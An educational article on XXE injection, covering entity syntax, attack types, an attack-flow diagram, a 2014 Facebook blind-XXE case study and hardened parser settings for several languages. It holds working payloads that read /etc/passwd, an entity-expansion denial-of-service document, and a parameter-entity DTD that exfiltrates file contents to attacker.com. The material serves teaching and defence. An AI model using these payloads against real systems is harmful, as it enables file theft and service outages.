XML External Entity (XXE) Injection
1. Definition
XML External Entity (XXE) Injection is a vulnerability that targets applications parsing XML input. It exploits a feature of XML called “external entities” to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Execute denial-of-service attacks
- In some cases, achieve remote code execution
XXE vulnerabilities arise when XML parsers are configured to process external entity declarations, which can reference local files or remote URLs.
2. Technical Explanation
XML allows defining entities as shortcuts for content. External entities can reference content from outside the XML document.
Basic XML Entity Syntax:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>
External Entity (XXE) Payload:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
When a parser with external entity resolution enabled processes this document, &xxe; is replaced with the contents of /etc/passwd.
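Whether the substitution actually happens depends on the parser and its configuration. The following minimal sketch feeds both documents above to Python's standard-library xml.etree.ElementTree, which (in current CPython releases) expands internal entities but reports external ones as undefined instead of fetching them. The helper name try_parse and the constant names are illustrative only.

```python
import xml.etree.ElementTree as ET

INTERNAL_DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>"""

EXTERNAL_DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""


def try_parse(document: str) -> str:
    """Return the root element's text, or a 'rejected: ...' message on a parse error."""
    try:
        return ET.fromstring(document).text
    except ET.ParseError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(try_parse(INTERNAL_DOC))  # internal entity is expanded in place
    print(try_parse(EXTERNAL_DOC))  # external entity is refused, nothing is read from disk
```

A parser that does resolve external entities would return the file contents for the second document, which is the behavior the attack relies on.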
Common XXE Attack Types:
- File Disclosure: Read sensitive files (/etc/passwd, config files, source code).
- SSRF: Make requests to internal services (http://169.254.169.254/).
- Blind XXE: Exfiltrate data via out-of-band channels when output is not returned.
- Billion Laughs (DoS): Exponentially expanding entities crash the parser.
Billion Laughs Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
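<root>&lol4;</root>
As written, this abbreviated four-level payload expands to only 1,000 copies of "lol" (about 3 KB). The classic attack continues the same pattern through ten entity declarations, so a document of under 1 KB expands to a billion copies, roughly 3 GB of data in memory.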
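The growth is easy to check with a little arithmetic: each level repeats the previous entity ten times, so the expanded size multiplies by ten per level. The function below is a small illustrative calculation (its name and parameters are not part of any library), assuming every level uses the same fan-out.

```python
def expanded_bytes(declarations: int, fanout: int = 10, base: str = "lol") -> int:
    """Size in bytes of the last entity after full expansion.

    declarations counts every <!ENTITY ...> line, including the base one,
    so the last entity contains fanout ** (declarations - 1) copies of base.
    """
    return len(base.encode("utf-8")) * fanout ** (declarations - 1)


if __name__ == "__main__":
    print(expanded_bytes(4))   # the four-declaration payload above: 3000 bytes
    print(expanded_bytes(10))  # ten declarations: 3000000000 bytes, about 3 GB
```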
3. Attack Flow
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant XMLParser as XML Parser
participant FileSystem as File System
Attacker->>WebApp: POST /api/upload<br/>Content-Type: application/xml
Note over Attacker: XML payload with<br/>external entity definition
WebApp->>XMLParser: Parse XML input
XMLParser->>XMLParser: Process DOCTYPE declaration<br/>Found external entity
XMLParser->>FileSystem: Read file:///etc/passwd
FileSystem-->>XMLParser: File contents returned
XMLParser-->>WebApp: Parsed XML with file contents
WebApp-->>Attacker: Response contains /etc/passwd
4. Real-World Case Study: Facebook XXE (2014)
Target: Facebook’s careers portal. Vulnerability Class: Blind XXE via Word document upload.
The Vulnerability: Facebook’s careers page allowed users to upload resumes. The application accepted .docx files, which are actually ZIP archives containing XML files. The XML parser processing these files had external entity processing enabled.
The Attack: Security researcher Mohamed Ramadan discovered that:
- .docx files contain XML files (e.g., word/document.xml).
- He crafted a malicious .docx with an XXE payload in the XML.
- The payload referenced an external URL he controlled.
- When Facebook parsed the document, it made a request to his server.
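From the defender's side, the same container structure can be inspected before any XML part reaches a parser. The sketch below opens an uploaded .docx as a ZIP archive and reports parts whose prologue contains a DOCTYPE declaration. The function name, the 64 KiB read limit, and the byte-level search are assumptions made for illustration; a byte search like this would miss parts encoded as UTF-16, so it complements a hardened parser rather than replacing one.

```python
import io
import zipfile
from typing import List

# Assumed limit: a DOCTYPE must appear before the root element,
# so only the start of each part is inspected.
PROLOGUE_BYTES = 64 * 1024


def docx_parts_with_doctype(docx_bytes: bytes) -> List[str]:
    """Return the names of XML parts inside a .docx that declare a DOCTYPE."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            with archive.open(name) as part:
                prologue = part.read(PROLOGUE_BYTES)
            if b"<!DOCTYPE" in prologue:
                suspicious.append(name)
    return suspicious
```

An upload handler could reject the file outright when the returned list is non-empty.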
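Blind XXE Exfiltration: Since the file contents were not directly returned, he used parameter entities and an attacker-hosted DTD to exfiltrate data. The indirection is needed because XML does not allow parameter-entity references inside markup declarations in the internal DTD subset: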
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
The external DTD (evil.dtd) contained:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
Impact: This allowed reading arbitrary files from Facebook’s servers. Facebook paid Ramadan a bug bounty and patched the vulnerability by disabling external entity processing. (The widely quoted $33,500 figure belongs to a separate Facebook XXE report by Reginaldo Silva.)
5. Detailed Defense Strategies
A. Disable External Entity Processing
The most effective defense is to disable external entities entirely.
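As a dependency-free illustration of the principle, the following sketch uses Python's standard-library xml.sax reader and switches off the SAX features for external general and external parameter entities before parsing. The TextCollector class and the function name are hypothetical helpers written for this example. Recent Python versions already leave external general entities off by default, so setting the features explicitly mainly documents the intent.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class TextCollector(ContentHandler):
    """Hypothetical handler that accumulates all character data."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def text_without_external_entities(xml_bytes: bytes) -> str:
    """Parse xml_bytes and return its text, never resolving external entities."""
    parser = xml.sax.make_parser()
    # Refuse to fetch external general and external parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)
```

With these settings a reference such as &xxe; is skipped rather than resolved, so the surrounding text is returned without any file contents.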
Java (DocumentBuilderFactory):
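import javax.xml.parsers.DocumentBuilderFactory;
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration (the strongest setting).
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth if DOCTYPE must ever be allowed: never resolve external entities.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python (lxml):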
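from lxml import etree
# Do not expand entities, and never fetch DTDs or entities over the network.
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)  # xml_file: path or file object supplied by the caller
PHP: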
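// libxml_disable_entity_loader() is deprecated since PHP 8.0, where external entity loading is off by default.
if (PHP_VERSION_ID < 80000) { libxml_disable_entity_loader(true); }
$doc = new DOMDocument();
// LIBXML_NOENT and LIBXML_DTDLOAD enable entity substitution and DTD loading, so they are omitted here.
$doc->loadXML($xml, LIBXML_NONET);
.NET: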
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
B. Use Less Complex Data Formats
If possible, avoid XML entirely for user input.
- JSON: Does not have entity processing features.
- YAML: No external entities, but it has its own security concerns (for example, unsafe object deserialization in some loaders).
- Protocol Buffers / MessagePack: Binary formats without these risks.
C. Input Validation
If XML is required, validate and sanitize input.
- Schema Validation: Use XSD to enforce structure.
- Strip DOCTYPE: Remove or reject XML with DOCTYPE declarations.
- Content-Type Checking: Ensure uploaded files match expected types.
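Rejecting DOCTYPE declarations is more reliable when done with a real XML tokenizer than with string matching. The sketch below, using only Python's standard library, runs the input through an expat parser whose DOCTYPE handler raises, and only then hands the document to ElementTree. The exception class and function names are illustrative, and parsing the input twice is a simplification chosen for clarity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees <!DOCTYPE, before any entity is declared.
    raise DoctypeForbidden(f"DOCTYPE declaration {name!r} is not allowed")


def parse_rejecting_doctype(xml_bytes: bytes) -> ET.Element:
    """Return the parsed root element, or raise if the document has a DOCTYPE."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    # Raises DoctypeForbidden for a DOCTYPE, expat.ExpatError for malformed XML.
    checker.Parse(xml_bytes, True)
    return ET.fromstring(xml_bytes)
```

Because the check stops at the DOCTYPE itself, entity-expansion payloads are refused before any expansion takes place.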
D. Web Application Firewall (WAF)
Configure WAF rules to detect XXE patterns.
- Block requests containing <!ENTITY, <!DOCTYPE, SYSTEM, PUBLIC.
- Be aware that attackers may use encoding to bypass simple pattern matching.
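The encoding caveat can be made concrete with a deliberately naive filter. The sketch below is not a real WAF rule, only an assumed byte-level pattern match on the four tokens listed above. It flags a UTF-8 payload but misses the identical payload re-encoded as UTF-16, which XML parsers are required to accept.

```python
import re

# Naive byte-level signature for the tokens listed above (illustrative only).
XXE_TOKENS = re.compile(rb"<!ENTITY|<!DOCTYPE|SYSTEM|PUBLIC")


def naive_waf_blocks(body: bytes) -> bool:
    """Return True if the raw request body matches the naive XXE signature."""
    return XXE_TOKENS.search(body) is not None


PAYLOAD = (
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<root>&xxe;</root>"
)

if __name__ == "__main__":
    print(naive_waf_blocks(PAYLOAD.encode("utf-8")))   # True: tokens appear as plain bytes
    print(naive_waf_blocks(PAYLOAD.encode("utf-16")))  # False: every character is two bytes
```

A filter has to decode the body the same way the parser will before matching, which is one reason pattern matching is best treated as a supplementary control.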
E. Least Privilege
Limit the XML parser’s access.
- Filesystem: Run parser in sandboxed environment with minimal file access.
- Network: Block outbound connections from XML processing services.
- User Permissions: Parser process should not run as root.
